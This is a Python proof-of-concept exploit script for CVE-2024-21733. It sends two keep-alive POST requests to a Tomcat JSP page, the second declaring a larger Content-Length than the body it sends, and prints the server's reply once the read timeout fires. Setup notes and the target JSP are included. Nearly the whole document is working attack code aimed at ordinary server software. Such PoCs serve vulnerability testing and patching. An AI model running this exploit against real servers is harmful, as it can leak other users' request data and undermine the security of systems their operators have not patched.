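import socket

# PoC for CVE-2024-21733: two POST requests on one keep-alive connection,
# the second of which declares a larger Content-Length than the body it
# actually sends. The output of interest is the server's reply to that
# second request.
#
# Note 1: the reply to the second POST only arrives after the server's read
#         timeout expires (20 seconds by default).
# Note 2: the Tomcat locale must be English: -Duser.language=en -Duser.country=US
#
# vulnerable.jsp as deployed on the test server:
#
#   <%
#   // read the "id" parameter of the request
#   String id = request.getParameter("id");
#   // print the value of id
#   if (id != null) {
#       out.println("The ID is: " + id);
#   } else {
#       out.println("No ID parameter provided.");
#   }
#   %>

# Server address and port.
server_address = ('127.0.0.1', 8080)

# Upper bound on the number of 2048-byte chunks read after the second reply.
# The original script read a fixed 16 chunks; this version also stops early
# once the peer closes the connection.
MAX_CHUNKS = 16


def send_post(sock, content_length, body):
    """Send a keep-alive POST to /vulnerable.jsp on ``sock``.

    Headers and body go out in two separate sendall() calls, as in the
    original script. ``content_length`` is written verbatim into the
    Content-Length header and is deliberately NOT derived from ``body``:
    the second request relies on the declared length being larger than
    the number of bytes actually sent.

    Args:
        sock: a connected TCP socket.
        content_length: value for the Content-Length header.
        body: request body (sent UTF-8 encoded).
    """
    headers = (
        "POST /vulnerable.jsp HTTP/1.1\r\n"
        "Host: localhost\r\n"
        "Connection: keep-alive\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {content_length}\r\n"
        "\r\n"
    )
    sock.sendall(headers.encode('utf-8'))
    sock.sendall(body.encode('utf-8'))


# Create a TCP/IP socket; the with-block closes it on every exit path.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    try:
        # Connect to the server.
        sock.connect(server_address)

        # First request: declared length 48, body of 48 bytes, so it is a
        # complete request and is answered right away.
        send_post(sock, 48, "id=123456789123456789123456789123456789123456789")
        response = sock.recv(2048)
        print(f"Received response1:\n{response.decode('utf-8', errors='replace')}")

        # Second request: declares 35 bytes but sends only 27, so the server
        # keeps waiting for the rest until its read timeout fires (note 1).
        send_post(sock, 35, "incomplete_data=00000000000")
        response = sock.recv(2048)
        print(f"Received response2:\n{response.decode('utf-8', errors='replace')}")

        # Drain whatever follows. recv() returning b"" means the peer closed
        # the connection; the original fixed sequence of reads did not detect
        # that and printed empty lines instead. errors='replace' keeps a
        # multibyte sequence split across two chunks from aborting the read.
        for _ in range(MAX_CHUNKS):
            response = sock.recv(2048)
            if not response:
                break
            print(response.decode('utf-8', errors='replace'))
    except Exception as e:
        # Top-level boundary of a script: report and fall through to close.
        print(f"An error occurred: {e}")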